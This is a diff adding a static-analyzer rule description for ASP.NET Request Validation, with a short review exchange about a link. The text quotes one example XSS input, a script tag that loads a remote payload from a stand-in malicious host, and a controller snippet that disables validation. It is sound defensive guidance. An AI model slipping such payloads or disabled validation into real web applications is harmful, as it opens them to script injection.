analyzers/rspec/cs/S5753_c#.html

```diff
@@ -0,0 +1,50 @@
+<p>ASP.NET 1.1+ comes with a feature called <em>Request Validation</em>, preventing the server to accept content containing un-encoded HTML. This
+feature comes as a first protection layer against Cross-Site Scripting (XSS) attacks and act as a simple Web Application Firewall (WAF) rejecting
+requests potentially containing malicious content.</p>
+<p> While this feature is not a silver bullet to prevent all XSS attacks, it helps to catch basic ones. It will for example prevent <code>&lt;script
+type="text/javascript" src="https://malicious.domain/payload.js"&gt;</code> to reach your Controller.</p>
+<p>Note: <em>Request Validation</em> feature being only available for ASP.NET, no Security Hotspot is raised on ASP.NET Core applications.</p>
+<h2>Ask Yourself Whether</h2>
+<p> * the developer doesn't know the impact to deactivate the Request Validation feature</p>
+<p> * the web application accepts user supplied data</p>
+<p> * all user supplied data are not validated</p>
+<p>There is a risk if you answered yes to any of those questions.</p>
+<h2>Recommended Secure Coding Practices</h2>
+<p> * Activate the Request Validation feature for all HTTP requests</p>
+<h2>Sensitive Code Example</h2>
+<p>At Controller level:</p>
+<pre>
+[ValidateInput(false)]
+public ActionResult Welcome(string name)
+{
+  ...
+}
+</pre>
+<h2>Compliant Solution</h2>
+<p>At Controller level:</p>
+<pre>
+[ValidateInput(true)]
+public ActionResult Welcome(string name)
+{
+  ...
+}
+or
+public ActionResult Welcome(string name)
+{
+  ...
+}
+</pre>
+<h2>See</h2>
+<p> * <a href="https://owasp.org/www-community/ASP-NET_Request_Validation">OWASP ASP.NET Request Validation</a></p>
+<p> * <a
+href="https://docs.microsoft.com/en-us/dotnet/api/system.web.configuration.httpruntimesection.requestvalidationmode?view=netframework-4.8">HttpRuntimeSection.RequestValidationMode
```

Comment:
Should we keep this link as a general education on the topic?

Reply:
I removed it, to avoid confusion